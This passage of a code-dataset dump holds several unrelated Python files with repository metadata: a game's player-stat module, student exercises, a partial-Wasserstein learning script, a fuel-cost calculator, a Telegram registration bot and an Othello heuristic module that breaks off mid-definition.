nonhumanoid=[\n\"🐶\",\"🐱\",\"🐭\",\"🐹\",\"🐰\",\"🦊\",\"🐻\",\"🐼\",\"🐨\",\"🐯\",\"🦁\",\"🐮\",\"🐷\",\"🐽\",\"🐸\",\"🐵\",\n\"🙈\",\"🙉\",\"🙊\",\"🐒\",\"🐔\",\"🐧\",\"🐦\",\"🐤\",\"🐣\",\"🐥\",\"🦆\",\"🦅\",\"🦉\",\"🦇\",\"🐺\",\"🐗\",\"🐴\",\"🦄\",\n\"🐝\",\"🐛\",\"🦋\",\"🐌\",\"🐞\",\"🐞\",\"🦟\",\"🦗\",\"🐞\",\"🦂\",\"🐢\",\"🐍\",\"🦎\",\"🦖\",\"🦕\",\"🐙\",\"🦑\",\"🦐\", #🐜 and 🕷️ have been replaced by 🐞 to stand out against discord's dark background better\n\"🦞\",\"🦀\",\"🐡\",\"🐠\",\"🐟\",\"🐬\",\"🐳\",\"🐋\",\"🦈\",\"🐊\",\"🐅\",\"🐆\",\"🦓\",\"🦍\",\"🦧\",\"🐘\",\"🦛\",\"🦏\",\n\"🐪\",\"🐫\",\"🦒\",\"🦘\",\"🐃\",\"🐂\",\"🐄\",\"🐎\",\"🐖\",\"🐏\",\"🐑\",\"🦙\",\"🐐\",\"🦌\",\"🐕\",\"🐩\",\"🦮\",\"🐕‍🦺\",\n\"🐈\",\"🐓\",\"🦃\",\"🦚\",\"🦜\",\"🦢\",\"🦩\",\"🕊️\",\"🐇\",\"🦝\",\"🦨\",\"🦡\",\"🦦\",\"🦥\",\"🐁\",\"🐀\",\"🐿\",\"🦔\",\n\"🐉\",\"🐲\",\"🪐\",\"💫\",\"🌪\",\"🌈\",\"📠\",\"📺\"]\n\n if rng.random() > 0.5:\n return rng.choice(humanoid)\n else:\n return rng.choice(nonhumanoid)\n\nclass PlayerStlats(NamedTuple):\n stance: str = \"Incredibly boring\"\n fav_tea: str = \"Iced\"\n nyoomability: float = 1.5 # movement speed\n\n # unused for now except for fun\n tofu: float = 4\n wiggle: float = 0.5 # chance someone breaks out of a bird / someone about to bump into a swordfight holds back instead\n ritualism: float = 2\n\n unworthiness: float = 0.5\n splortsmanship: float = 1.0\n tankitude: float = 1.0\n pettiness: float = 0.0\n owlishness: float = 0.0\n disco: float = 0.0\n pettability: float = 0.0\n softness: float = 0.0\n improv: float = 0.0\n tentacles: int = 1\n capitalism: float = -0.5\n\n # shot power stats\n musclitude: float = 1.0 # how hard you swing\n finesse: float = 1.0 # how consistent your shots are hit with power, higher = better\n estimation: int = 0\n\n # swordfighting stlats\n churliness: float = 0.2 # how likely this player will go for offensive options in a swordfight\n earliness: float = 0.2 # how likely this player will go for defensive options in a swordfight\n twirliness: float = 0.2 # how likely this player will go for stylish options in a swordfight\n aceness: float = 0.3 # chance of resisting a kiss\n marbles: int = 3 # beginning-of-fight swordfighting hp\n\n polkadottedness: int = 0 # used for easter egg\n\n # shot angle stats\n needlethreadableness: float = 0.8 # how well you thread the needle (multiplier for how much angle variance your shots have), lower = better\n left_handedness: float = 0.0 # how biased your shots are to the left or right. can go negative, 0 = best, away from 0 = worse\n\n sin_rating = None\n\nclass Player:\n def __init__(self, name:str, stlats: PlayerStlats, emoji:str=\"🏌️\", id:str=\"\", feed_entries = None, modifications=None):\n self.name = name\n self.stlats = stlats\n self.emoji = emoji\n self.id = id\n \n self.feed_entries = []\n if feed_entries is not None:\n self.feed_entries = feed_entries\n\n self.modifications = []\n if modifications is not None:\n self.modifications = modifications\n \n\n def unpredictability(self): \n # how much someone sticks to one swordfighting style. 0-1, 1 = better\n # if someone will always choose offensive, this is 0. 
if it's split evenly between churliness, earliness, and twirliness, it's 1\n weights = [self.stlats.churliness,self.stlats.earliness,self.stlats.twirliness]\n if self.stlats.stance in (\"Aggro\",\"Powerful\",\"Hand to Hand\",\"DPS\",\"Explosive\",\"Hardcore\", \"Wibble\",\"Electric\"): #offense-boosting stances\n weights[0] += 0.5\n # earliness-boosting stances\n elif self.stlats.stance in (\"Tanky\",\"Twitchy\",\"Repose\",\"Reverse\",\"Softcore\", \"Cottagecore\",\"Pomegranate\"): # defense-boosting stances\n weights[1] += 0.5\n #twirliness-boosting stances\n if self.stlats.stance in (\"Feint\",\"Tricky\",\"Pop-Punk\",\"Flashy\",\"Spicy\", \"Corecore\",\"Wobble\",\"Lefty\"): # style-boosting stances\n weights[2] += 0.5\n\n weights = sorted(weights, reverse=True)\n\n chanceOfBiggest = weights[0]/sum(weights) #this ranges from highest = 1 to lowest = 1/len(weights)\n\n minChance = 1/len(weights)\n\n return 1-(chanceOfBiggest-minChance)/(1-minChance)\n\n\n def compute_driving_moons(self):\n return format_stlat_display(self.driving_rating())\n\n def driving_rating(self): # \"Driving\": hitting, and driving a kart\n # +disco + tankitude\n rating_number = (self.stlats.musclitude + self.stlats.tofu)*5/2\n return rating_number\n\n def compute_precision_moons(self):\n return format_stlat_display(self.precision_rating())\n\n def precision_rating(self):\n # +pettability + splortsmanship +tentacles\n rating_number = ((1-self.stlats.needlethreadableness)*0.5 + self.stlats.finesse + self.stlats.estimation*0.2) * 5/(1+0.2+0.5) - abs(self.stlats.left_handedness)\n return rating_number\n\n def compute_aerodynamics_moons(self):\n return format_stlat_display(self.aerodynamics_rating())\n\n def aerodynamics_rating(self):\n # +ritualism +softness +owlishness - unworthiness\n\n rating_number = (self.stlats.ritualism + self.stlats.owlishness + self.stlats.softness) * 5/3 #unused for now, need more stlats\n return rating_number\n\n def compute_self_awareness_moons(self):\n return format_stlat_display(self.self_awareness_rating())\n\n def self_awareness_rating(self):\n # - self.stlats.pettiness - capitalism + improv + tentacles\n rating_number = (self.stlats.wiggle*0.5 + (self.stlats.marbles-2)/2 + self.unpredictability()*0.8) * 5/(0.5+1+0.8) + self.stlats.polkadottedness * 5 #means nothing for now\n return rating_number\n\n def get_biggest_stlat_rating(self):\n ratings = [\n (\"Driving\", self.driving_rating()),\n (\"Precision\", self.precision_rating()),\n (\"Aerodynamics\", self.aerodynamics_rating()),\n (\"Self-Awareness\", self.self_awareness_rating()),\n ]\n ratings.sort(key=lambda item:item[1], reverse=True)\n return ratings[0]\n\n def modifications_string(self):\n if len(self.modifications) == 0:\n return \"\"\n else:\n preamble = \"**Modifications**: \\n\"\n return preamble + \"\\n\".join([self.modification_string(mod) for mod in self.modifications])\n\n def modification_string(self, mod_dict):\n if type(mod_dict) is str:\n return mod_dict\n try:\n template = f'''- {mod_dict['emoji']} {mod_dict['name']}\n {mod_dict['description']}'''\n except KeyError as e:\n print(e)\n print(\"danger\")\n template = \"- ☢️ Unstable ☢️ \\n This Modification is Unstable. Something has gone very wrong in the dated base. DANGER! DANGER! 
DANGER!\"\n\n return template\n\n def vk_stat_of_the_day(self):\n stlat_choices = list(self.stlats._fields)\n stlat_choices.remove(\"fav_tea\")\n stlat_choices.remove(\"stance\")\n stlat_choices.remove(\"polkadottedness\")\n #stlat_choices.remove(\"sin_rating\")\n today = date.today()\n rng = random.Random(today.isoformat()) # seed rng with today's date\n\n stlatname = rng.choice(stlat_choices)\n stlat = getattr(self.stlats, stlatname, ':ghost:')\n\n fancystlatname = stlatname.replace(\"_\",\" \").title()\n return f\"**Today's Verboten Knowledge Stlat:**\\n||{fancystlatname}: {stlat:.2f}||\"\n\n def get_display_name(self, with_mods_in_parens = False):\n if with_mods_in_parens and len(self.modifications) > 0:\n modList = ', '.join([mod.displayEmoji for mod in self.modifications])\n return f\"{self.name} ({self.emoji}) ({modList})\"\n else:\n return f\"{self.name} ({self.emoji})\"\n\n @classmethod\n def from_dict(cls, data: dict):\n # Given a dict with {\"id\": blah, \"stlats\":<blah>} from the DB, construct a new Player\n data[\"stlats\"] = PlayerStlats(*data[\"stlats\"])\n data[\"modifications\"] = [saved_mod_data.SavedModificationDataTemplate(**mod_dict) for mod_dict in data[\"modifications\"]]\n return cls(**data)\n\n def to_dict(self):\n # convert player into a dict, for saving in the DB\n\n dict = self.__dict__\n dict[\"modifications\"] = [mod_dict.to_dict() for mod_dict in self.modifications]\n\n return dict\n\n\n\ndef generate_random_player_from_name(name=\"Random Player\", emoji=\"🏌️\"):\n \"\"\"\n Generate a completely random player.\n \"\"\"\n\n seed = name.strip().title()\n\n rng = random.Random(seed)\n if seed:\n id_ = uuid.uuid3(uuid.NAMESPACE_X500, name=str(seed)).hex\n else:\n id_ = uuid.uuid4().hex\n\n stlats = generate_random_stlats_from_name(name)\n\n if emoji is not None:\n emoji = random_player_emoji(rng)\n\n return Player(name=name, id=id_, stlats=stlats,emoji=emoji)\n \n\n\ndef generate_random_stlats_from_name(name=\"Random Player\"):\n # Generate stlats for a player using their name\n name = name.strip().title() # case insensitive\n\n rng = random.Random(name) #seed with name\n\n return PlayerStlats(\n nyoomability = max(rng.gauss(0,0.3),1.4),\n tofu= rng.random(), \n wiggle= rng.random(), \n ritualism= rng.random(), \n musclitude= rng.random(),\n finesse= rng.random(),\n needlethreadableness= rng.random(), \n left_handedness= rng.gauss(0,0.3), \n stance= rng.choice([\"Tricky\",\"Flashy\",\"Aggro\",\"Tanky\",\"Twitchy\",\"Powerful\",\n \"Wibble\",\"Wobble\",\"Reverse\",\"Feint\",\"Electric\",\"Spicy\",\"Pomegranate\",\n \"Explosive\",\"Cottagecore\",\"Corecore\",\"Hardcore\",\"Softcore\",\n \"Hand to Hand\",\"Lefty\",\"Pop-Punk\",\"DPS\",\"Repose\"]),\n fav_tea= rng.choice([\"Iced\",\"Boba\",\"White\",\"Green\",\"Oolong\",\n \"Pu'erh\",\"Chai\",\"Milk\",\"Neon\",\"Sweet\",\"Void\",\"Tea?\",\"Caramel\",\n \"Lightspeed\",\"Time-traveling\",\"Bloody\",\"Black\",\"Miso\",\"Concrete\",\n \"Hard-boiled egg\",\"Hot Chocolate\",\"Bubble\"]),\n estimation= rng.random(),\n\n earliness= rng.random(),\n twirliness= rng.random(),\n churliness= rng.random(),\n aceness=rng.random(),\n marbles= rng.randrange(2,4),\n\n unworthiness=rng.random(),\n splortsmanship=rng.random(),\n tankitude=rng.random(),\n pettiness=rng.random(),\n owlishness=rng.random(),\n disco=rng.random(),\n pettability=rng.random(),\n softness=rng.random(),\n improv=rng.random(),\n tentacles= rng.randrange(0,10),\n capitalism= -rng.random() # always negative\n\n )\n\ndef player_with_mods_but_random_stats(name, 
mods):\n player = generate_random_player_from_name(name)\n player.modifications = mods\n return player\n\n\n# Easter egg: polkadot has max stats\nknown_players = {\n \"Polkadot Patterson\": Player(name=\"Polkadot Patterson\", id=1, stlats=PlayerStlats(\n stance=\"Squiddish\",\n fav_tea= \"Iced\",\n nyoomability = 1.5,\n musclitude=1,\n finesse=1,\n needlethreadableness=1,\n polkadottedness=1, \n left_handedness= 0,\n estimation=1,\n twirliness=0.3,\n churliness=0.3,\n earliness=0.3,\n marbles=4,\n\n tofu=1, # unused\n wiggle=1, # unused\n ritualism=1, # unused\n owlishness=1,\n softness=1,\n unworthiness=0,\n tentacles=4,\n ),emoji=\"😅\"),\n \"Simulacrum\": player_with_mods_but_random_stats(\"Simulacrum\",[saved_mod_data.spookyGrandUnchipMod]),\n \"Solar Dies\": player_with_mods_but_random_stats(\"Solar Dies\",[saved_mod_data.spookyGrandUnchipMod]),\n \"Load Bearing Coconut\": player_with_mods_but_random_stats(\"Load Bearing Coconut\",[saved_mod_data.championshipJacket]),\n \"Frankle Knives\": player_with_mods_but_random_stats(\"Frankle Knives\",[saved_mod_data.championshipJacket]),\n \"Spooks Mcgee\": player_with_mods_but_random_stats(\"Spooks McGee\",[saved_mod_data.championshipJacket]),\n \"Line Cook\": player_with_mods_but_random_stats(\"Line Cook\",[saved_mod_data.championshipJacket]),\n \"The 12th Herb And Spice\": player_with_mods_but_random_stats(\"The 12th Herb And Spice\",[saved_mod_data.championshipJacket]),\n \"Caldera Clembons\": player_with_mods_but_random_stats(\"Caldera Clembons\",[saved_mod_data.buff]),\n \"1\": player_with_mods_but_random_stats(\"1\",[saved_mod_data.foxFriendship]),\n # \"Hands Scoresburg\": player_with_mods_but_random_stats(\"Hands Scoresburg\",[\"🖊️🏄\"]), #I've forgotten what this means\n \"Test Robot\": player_with_mods_but_random_stats(\"Test Robot\",[saved_mod_data.spookyGrandUnchipMod]),\n \"Dog Dad\": player_with_mods_but_random_stats(\"Dog Dad\",[saved_mod_data.voidTrapped,saved_mod_data.championshipJacket]),\n \"Melissa Bop\": player_with_mods_but_random_stats(\"Melissa Bop\", [saved_mod_data.nutrisocks]),\n \"Merriment Roomba\": player_with_mods_but_random_stats(\"Merriment Roomba\", [saved_mod_data.championshipJacket])\n}\nknown_players[\"Alto\"] = known_players[\"Polkadot Patterson\"]\n\n\ndef generate_player_from_name(name):\n # if they're not there, generate a player from their name with random stats\n # or, if it's a known player, generate them with known stuff\n if name.title() in known_players:\n return known_players[name.title()]\n else:\n return generate_random_player_from_name(name)\n\ndef format_stlat_display(mooncount: float):\n num_stars = math.floor(abs(mooncount))\n whole_moons = \"🌕\" * num_stars\n remainder = abs(mooncount)-num_stars\n if mooncount > 0:\n if remainder >= 0.75:\n return whole_moons + \"🌖\"\n elif remainder >= 0.5:\n return whole_moons + \"🌗\"\n elif remainder >= 0.25:\n return whole_moons + \"🌘\"\n else: #remainder < 0.25\n return whole_moons\n else:\n if remainder >= 0.75:\n return \"-🌔\"+whole_moons\n elif remainder >= 0.5:\n return \"-🌓\"+whole_moons\n elif remainder >= 0.25:\n return \"-🌒\" + whole_moons\n else: #remainder < 0.25\n if num_stars == 0:\n return \"\" # no negative sign for zero, otherwise it would just be \"-\"\n return \"-\" + whole_moons\n\n","repo_name":"hillexed/glolf","sub_path":"glolf/data/playerstlats.py","file_name":"playerstlats.py","file_ext":"py","file_size_in_byte":17888,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
+{"seq_id":"9919582990","text":"#Kovlin Perumal\r\n#PRMKOV001\r\n#09/05/2014\r\n#Palindromic Primes Function\r\n\r\nimport sys, math\r\nsys.setrecursionlimit (30000)#Set recursion limt\r\n\r\n\r\nfrom math import *\r\n\r\ndef palinCheck(num) :#Same function converted from question one\r\n num = str(num)\r\n if len(num) == 1 or len(num) == 0:\r\n return True\r\n else :\r\n if num[0] != num[-1] :\r\n return False\r\n else:\r\n return palinCheck(num[1:len(num) - 1])\r\n \r\ndef isprime(num,k):\r\n if num <= 1:\r\n return False\r\n elif math.sqrt(num) < k: #If the squareroot is exceeded number must be a prime because one half of factors exhausted\r\n return True\r\n elif num%k == 0 :\r\n return False #If divisible not a prime\r\n else:\r\n return isprime(num,k+1) #Recall function to check whether num is divisible by the next value of k\r\n\r\na = int(input('Enter the starting point N:\\n'))\r\nb = int(input('Enter the ending point M:\\n')) #Recieve input\r\n\r\nprint('The palindromic primes are:')\r\n\r\ndef output(start, end) : #Recursive function to replace a loop for output\r\n if start > end :\r\n return \r\n else:\r\n if palinCheck(start):\r\n if isprime(start,2): #Call the previous functions to check whether a num in the entered interval is a palindrome and prime\r\n print(start)\r\n output(start+1,end)\r\n \r\noutput(a,b)\r\n\r\n\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/prmkov001/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43254996483","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 24 21:31:13 2021\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\n\r\n\r\nimport numpy as np\r\nimport scipy as sp\r\n\r\n\r\nimport ot\r\nimport utils\r\n\r\nimport KM\r\n\r\n\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\n\r\ndef compute_cost_matrices(P, U, prior, nb_dummies=0):\r\n\r\n # Positive dataset with dummy points\r\n n_unl_pos = int(U.shape[0]*prior)\r\n P_ = P.copy()\r\n P_ = np.vstack([P_, np.zeros((nb_dummies, P.shape[1]))])\r\n\r\n # weigths\r\n mu = (np.ones(len(P_))/(len(P_)-nb_dummies))*(n_unl_pos/len(U))\r\n if nb_dummies > 0:\r\n mu[-nb_dummies:] = (1 - np.sum(mu[:-nb_dummies]))/nb_dummies\r\n else:\r\n mu = mu / np.sum(mu)\r\n nu = np.ones(len(U))/len(U)\r\n\r\n # intra-domain\r\n C1 = sp.spatial.distance.cdist(P_, P_)\r\n C2 = sp.spatial.distance.cdist(U, U)\r\n if nb_dummies > 0:\r\n C1[:, -nb_dummies:] = C1[-nb_dummies:, :] = C2.max()*1e2\r\n C1[-nb_dummies:, -nb_dummies:] = 0\r\n\r\n # inter-domain\r\n if P_.shape[1] == U.shape[1]:\r\n C = sp.spatial.distance.cdist(P_, U)\r\n if nb_dummies > 0:\r\n C[-nb_dummies:, :] = 1e2 * C[:-nb_dummies, :].max()\r\n else:\r\n C = None\r\n return C, C1, C2, mu, nu\r\n\r\n\r\ndef pu_w_emd(p, q, C, nb_dummies=1):\r\n\r\n lstlab = np.array([0, 1])\r\n labels_a = np.append(np.array([0]*(len(p)-nb_dummies)),\r\n np.array([1]*(nb_dummies)))\r\n\r\n def f(G):\r\n res = 0\r\n for i in range(G.shape[1]):\r\n for lab in lstlab:\r\n temp = G[labels_a == lab, i]\r\n res += (np.linalg.norm(temp, 1))**0.5\r\n return res\r\n\r\n def df(G):\r\n W = np.zeros(G.shape)\r\n for i in range(G.shape[1]):\r\n for lab in lstlab:\r\n temp = G[labels_a == lab, i]\r\n W[labels_a == lab, i] = 0.5*(np.linalg.norm(temp, 1))**(-0.5)\r\n return W\r\n\r\n Gc = ot.optim.cg(p, q, C, 1e6, f, df, numItermax=20)\r\n return Gc\r\n\r\n\r\nn_unl = 800\r\nn_pos = 400\r\nnb_dummies = 
10\r\n\r\nprior = 0.5\r\n\r\ndataset = \"house\"\r\n\r\ndataset_p = dataset\r\ndataset_u = dataset\r\n\r\nP, U, y_u = utils.draw_p_u_dataset_scar(dataset_p, dataset_u, n_pos,\r\n n_unl, prior, 1) \r\n\r\nestimation_prior = KM.estimate_class_prior(P,U)\r\n\r\nCtot, _, _, mu, nu = compute_cost_matrices(P, U, estimation_prior, nb_dummies)\r\n#nb_unl_pos = int(np.sum(y_u))\r\nnb_unl_pos = int(estimation_prior*n_unl)\r\n\r\ntransp_emd = ot.emd(mu, nu, Ctot)\r\ny_hat = np.ones(len(U))\r\nsum_dummies = np.sum(transp_emd[-nb_dummies:], axis=0)\r\ny_hat[np.argsort(sum_dummies)[nb_unl_pos:]] = 0\r\n\r\nf1emd = f1_score(y_u,y_hat,average = 'micro')\r\n\r\n\r\ntransp_emd_group = pu_w_emd(mu, nu, Ctot, nb_dummies)\r\ny_hat = np.ones(len(U))\r\nsum_dummies = np.sum(transp_emd_group[-nb_dummies:], axis=0)\r\ny_hat[np.argsort(sum_dummies)[nb_unl_pos:]] = 0\r\n \r\nf1groups = f1_score(y_u,y_hat,average = 'micro')","repo_name":"guwengw/PW","sub_path":"partial_wasserstein.py","file_name":"partial_wasserstein.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1275292200","text":"class Solution:\n def twoSum(self,numbers,target):\n i = 0\n j = len(numbers)-1\n while(i < len(numbers) and j != 0):\n if i != j:\n if numbers[i] + numbers[j] == target:\n return [i+1,j+1]\n elif numbers[i] + numbers[j] < target:\n i += 1\n else:\n j -= 1\n\nnumbers = list(map(int, input().split()))\ntarget = int(input())\nob = Solution()\nprint(ob.twoSum(numbers, target))","repo_name":"rupeshmohanty/Competitive-programming-problems","sub_path":"Python/Leetcode/twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29223318891","text":"from calculo import Calculo\n\n\ndef main():\n calc = Calculo()\n\n distancia = float(input(\"Distância em Quilômetros a ser percorrida? \\n\"))\n consumo = float(input(\"Consumo de combustível do veículo (Km/l)? \\n\"))\n combustivel = float(input(\"Escolha o combustivel: 1-Alcool, 2-Gasolina, 3-Diesel ou 4-Todos: \"))\n\n\n if combustivel == 1:\n print(\"O seu gasto em Álcool será de R$\", (calc.calcular_gasto_alcool(distancia, consumo)))\n elif combustivel == 2:\n print(\"O seu gasto em Gasolina será de R$\", (calc.calcular_gasto_gasolina(distancia, consumo)))\n elif combustivel == 3:\n print(\"O seu gasto em Díesel será de R$\", (calc.calcular_gasto_diesel(distancia, consumo)))\n elif combustivel == 4:\n print(\"Segue a relação de todos os combustiveis:\")\n print(\"Alcool R$ \", calc.calcular_gasto_alcool(distancia, consumo))\n print(\"Gasolina R$ \", calc.calcular_gasto_gasolina(distancia, consumo))\n print(\"Diesel R$ \", calc.calcular_gasto_diesel(distancia, consumo))\n else:\n print(\"Opção errada! 
Escolha uma das opções acima.\")\n exit()\n\nif __name__ == \"__main__\":\n main()","repo_name":"alves-wanderson/Python_calc_combustivel","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71070503800","text":"from aiogram import types\nfrom aiogram.dispatcher import FSMContext\n\nfrom tgbot.data.data import _\nfrom tgbot.service.repo.region_repo import RegionRepo\nfrom tgbot.service.repo.repository import SQLAlchemyRepos\nfrom tgbot.states.states import RegisterForm\n\n\nasync def get_name(message: types.Message, state: FSMContext):\n name = message.text\n if not name.isdigit():\n await state.update_data(name=name)\n await message.answer(\n text=_('Введите вашу фамилию'),\n reply_markup=types.InlineKeyboardMarkup(\n row_width=1,\n inline_keyboard=[\n [types.InlineKeyboardButton(text=_('❌ Отмена'), callback_data='cancel')]\n ]\n )\n )\n await RegisterForm.surname.set()\n else:\n await message.answer(\n text=_('⚠️ Вводите данные в правильном формате')\n )\n\n\nasync def get_surname(message: types.Message, state: FSMContext):\n surname = message.text\n if not surname.isdigit():\n await state.update_data(surname=surname)\n await message.answer(\n text=_('Введите ваш возраст. Мы принимаем заявки начиная от 18 лет'),\n reply_markup=types.InlineKeyboardMarkup(\n row_width=1,\n inline_keyboard=[\n [types.InlineKeyboardButton(text=_('❌ Отмена'), callback_data='cancel')]\n ]\n )\n )\n await RegisterForm.age.set()\n else:\n await message.answer(\n text=_('⚠️ Вводите данные в правильном формате')\n )\n\n\nasync def get_age(message: types.Message, state: FSMContext, repo: SQLAlchemyRepos):\n age = message.text\n if age.isdigit():\n if int(age) < 18:\n await message.answer(\n text=_('⚠️ Мы принимаем заявки только от 18 лет')\n )\n else:\n await state.update_data(age=age)\n region = repo.get_repo(RegionRepo)\n regions = await region.get_regions()\n keyboard = types.ReplyKeyboardMarkup(row_width=3, resize_keyboard=True, one_time_keyboard=True)\n for r in regions:\n keyboard.insert(types.KeyboardButton(text=r.region_name))\n await message.answer(\n text=_('Выберите ваш регион с помощью кнопок ниже'),\n reply_markup=keyboard,\n )\n await RegisterForm.region.set()\n else:\n await message.answer(\n text=_('⚠️ Вводите данные в правильном формате')\n )\n\n\nasync def get_region(message: types.Message, repo: SQLAlchemyRepos, state: FSMContext):\n region = message.text\n regions = await repo.get_repo(RegionRepo).get_regions()\n regions = [x.region_name for x in regions]\n if region not in regions:\n await message.answer(\n text=_('⚠️ Выбирайте только с помощью кнопок')\n )\n else:\n await state.update_data(region=region)\n await message.answer(\n text=_('Отправьте номер телефона с помощью кнопок ниже'),\n reply_markup=types.ReplyKeyboardMarkup(\n row_width=1,\n keyboard=[[types.KeyboardButton(text=_('📞 Отправить номер телефона'), request_contact=True)]],\n resize_keyboard=True,\n one_time_keyboard=True\n )\n )\n await RegisterForm.phone_number.set()\n\n\nasync def get_phone(message: types.Message, repo: SQLAlchemyRepos, state: FSMContext):\n phone_number = message.contact.phone_number\n await state.update_data(phone_number=phone_number)\n data = await state.get_data()\n await message.answer(\n text=_('❗️ Еще раз перепроверьте свои данные затем потдвердите ваше действие\\n\\n'\n '<b>Имя:</b> {name}\\n'\n '<b>Фамилия:</b> {surname}\\n'\n '<b>Возраст:</b> {age}\\n'\n 
'<b>Регион:</b> {region}\\n'\n '<b>Номер телефона:</b> {phone_number}').format(\n name=data.get('name'),\n surname=data.get('surname'),\n age=data.get('age'),\n email=data.get('email'),\n region=data.get('region'),\n phone_number=phone_number\n ),\n reply_markup=types.InlineKeyboardMarkup(\n row_width=1,\n inline_keyboard=[\n [types.InlineKeyboardButton(text=_('✅ Подтвердить'), callback_data='confirm')],\n [types.InlineKeyboardButton(text=_('❌ Отмена'), callback_data='cancel')],\n ]\n )\n )\n","repo_name":"uicodee/leoconsultingbot","sub_path":"tgbot/handlers/content/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18542337634","text":"import numpy as np\r\n\r\nclass StatisticData:\r\n\t\"\"\"\r\n\tSimple structure that holds data that are interesting for heuristic functions.\r\n\t\"\"\"\r\n\tdef __init__(self,\r\n\t\tmy_move_count,\r\n\t\topponent_move_count,\r\n\r\n\t\tshallow_board,\r\n\r\n\t\tscore,\r\n\r\n\t\tscale = 100.0\r\n\t\t):\r\n\r\n\t\tself.scale = scale\r\n\t\tself.my_move_count = my_move_count\r\n\t\tself.opponent_move_count = opponent_move_count\r\n\t\tself.mat = shallow_board\r\n\r\n\t\tself.score = score\r\n\r\n\tdef simple_from_board(board):\r\n\t\tmy_move_count = len(board.get_all_valid_moves(1) or [])\r\n\t\topponent_move_count = len(board.get_all_valid_moves(-1) or [])\r\n\t\tshallow_board = np.array(board.board)\r\n\t\tscore = np.sum(shallow_board)\r\n\t\treturn StatisticData(my_move_count, opponent_move_count, shallow_board, score)\r\n\r\n\tdef from_board_and_colors(raw_board, shallow_board, my_color, opponent_color):\r\n\t\tmy_move_count = len(raw_board.get_all_valid_moves(my_color) or [])\r\n\t\topponent_move_count = len(raw_board.get_all_valid_moves(opponent_color) or [])\r\n\t\tscore = np.sum(shallow_board)\r\n\t\treturn StatisticData(my_move_count, opponent_move_count, shallow_board, score)\r\n\r\n# The following are implemented heuristic functions:\r\n# Some were inspired by https://barberalec.github.io/pdf/An_Analysis_of_Othello_AI_Strategies.pdf\r\n\r\ndef HEUR_parity(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of fields\r\n\tcaptured by max - min player.\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\tscale = 100 / (data.mat.shape[0] * data.mat.shape[1])\r\n\r\n\tmoves = np.sum(np.abs(data.mat))\r\n\r\n\tif moves <= data.mat.shape[0]:\r\n\t\t# it is better to give away stones early\r\n\t\treturn -scale * data.score\r\n\t#else\r\n\treturn scale * data.score\r\n\r\nSTABILITY_MATRIX = None\r\n\r\nSTABILITY_MATRICES = {\r\n\t8:\r\n\r\n# inspired by https://courses.cs.washington.edu/courses/cse573/04au/Project/mini1/RUSSIA/Final_Paper.pdf\r\nnp.array(\r\n\t[\r\n\t\t[4,-3,2,2,2,2,-3,4],\r\n\t\t[-3,-4,-1,-1,-1,-1,-4,-3],\r\n\t\t[2,-1,1,0,0,1,-1,2],\r\n\t\t[2,-1,0,1,1,0,-1,2],\r\n\t\t[2,-1,0,1,1,0,-1,2],\r\n\t\t[2,-1,1,0,0,1,-1,2],\r\n\t\t[-3,-4,-1,-1,-1,-1,-4,-3],\r\n\t\t[4,-3,2,2,2,2,-3,4],\r\n\t]\r\n),\r\n\r\n10: np.array(\r\n\t[\r\n\t\t[4,-3,2,2,2,2,2,2,-3,4],\r\n\t\t[-3,-4,-1,-1,-1,-1,-1,-1,-4,-3],\r\n\t\t[2,-1,1,0,0,0,0,1,-1,2],\r\n\t\t[2,-1,0,0,0,0,0,0,-1,2],\r\n\t\t[2,-1,0,0,1,1,0,0,-1,2],\r\n\t\t[2,-1,0,0,1,1,0,0,-1,2],\r\n\t\t[2,-1,0,0,0,0,0,0,-1,2],\r\n\t\t[2,-1,1,0,0,0,0,1,-1,2],\r\n\t\t[-3,-4,-1,-1,-1,-1,-1,-1,-4,-3],\r\n\t\t[4,-3,2,2,2,2,2,2,-3,4],\r\n\t]\r\n),\r\n\r\n6: 
np.array(\r\n\t[\r\n\t\t[4,-3,2,2,-3,4],\r\n\t\t[-3,-4,-1,-1,-4,-3],\r\n\t\t[2,-1,1,1,-1,2],\r\n\t\t[2,-1,1,1,-1,2],\r\n\t\t[-3,-4,-1,-1,-4,-3],\r\n\t\t[4,-3,2,2,-3,4],\r\n\t]\r\n)\r\n}\r\n\r\ndef HEUR_stability(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference of stability\r\n\tof fields.\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\tstability = np.sum(data.mat * STABILITY_MATRIX)\r\n\r\n\treturn stability\r\n\r\ndef HEUR_corners(data: StatisticData) -> float:\r\n\t\"\"\"\r\n\tHeuristic function that takes into account the difference in\r\n\tcounts of corners captured.\r\n\t\r\n\tReturns evaluation, in most cases in range -100 - 100.\r\n\t\"\"\"\r\n\r\n\treturn 25 * (data.mat[0,0] + data.mat[0, -1] + data.mat[-1, 0] + data.mat[-1, -1])\r\n\r\nEDGE_MATRIX = None\r\n#np.array(\r\n#\t[\r\n#\t\t[4, 4, 4, 4, 4, 4, 4, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 0, 0, 0, 0, 0, 0, 4],\r\n#\t\t[4, 